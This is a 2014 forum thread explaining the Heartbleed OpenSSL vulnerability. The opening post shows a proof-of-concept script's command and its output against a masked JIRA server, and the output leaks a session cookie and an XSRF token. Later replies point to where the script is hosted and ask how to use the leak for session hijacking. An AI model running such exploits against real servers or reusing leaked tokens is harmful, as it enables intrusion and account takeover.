Thread subject: Security Override :: heartbleed.py exploit example

Posted by Cyber Wizard on 04/14/2014 01:26:35
#1

The Heartbleed issue is actually worse than it might immediately seem (and it seems pretty bad already).

In case youíve been out of the loop, Heartbleed (CVE-2014-0160) is a vulnerability in OpenSSL that allows any remote user to dump some of the contents of the serverís memory. And yes, thatís really bad. The major concern is that a skilled user could craft an exploit that could dump the RSA private key that the server is using to communicate with its clients. The level of knowledge / skill required to craft this attack isnít particularly high, but likely out of reach for the average script kiddie user.

So why is Heartbleed worse than you think? Itís simple: the currently-available proof-of-concept scripts allow any client, anywhere in the world, to perform a session hijacking attack of a logged in user.

As of this morning, the most widely-shared proof-of-concept is this simple Python script: https://gist.github.com/takeshixx/10107280. With this script, anyone in the world can dump a bit of RAM from a vulnerable server.

Letís have a look at the output of this utility against a vulnerable server running the JIRA ticket tracking system. The hex output has been removed to improve readability.

[matt@laptop ~]# python heartbleed.py jira.XXXXXXXXXXX.com
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 66
... received message: type = 22, ver = 0302, length = 3239
... received message: type = 22, ver = 0302, length = 331
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
.@..GET /browse/
en_US-cubysj-198
8229788/6160/11/
(lots of garbage)
..............Ac
cept-Encoding: g
zip,deflate,sdch
..Accept-Languag
e: en-US,en;q=0.
8..Cookie: atlas
sian.xsrf.token=
BWEK-0C0G-BSN7-V
OZ1|3d6d84686dc0
f214d0df1779cbe9
4db6047b0ae5|lou
t; JSESSIONID=33
F4094F68826284D1
8AA6D7ED1D554E..
..E.$3Z.l8.M..e5
..6D7ED1D554E...
......*..?.e.b..
WARNING: server returned more data than it should - server is vulnerable!

Posted by PythonB on 04/14/2014 23:27:07
#2

the gist.github link doesn't work however.

Posted by Cyber Wizard on 04/19/2014 15:14:21
#3

script is uploaded by override! in code section name heartbleed.py

Posted by PythonB on 04/20/2014 16:29:35
#4

Could you elaborate on how to session hijack with heartbleed?

Posted by PythonB on 04/20/2014 16:29:56
#5

Not server hijacking. I meant using heartbleed and the information you get from it to perform a session hijack to a user somewhere in the world.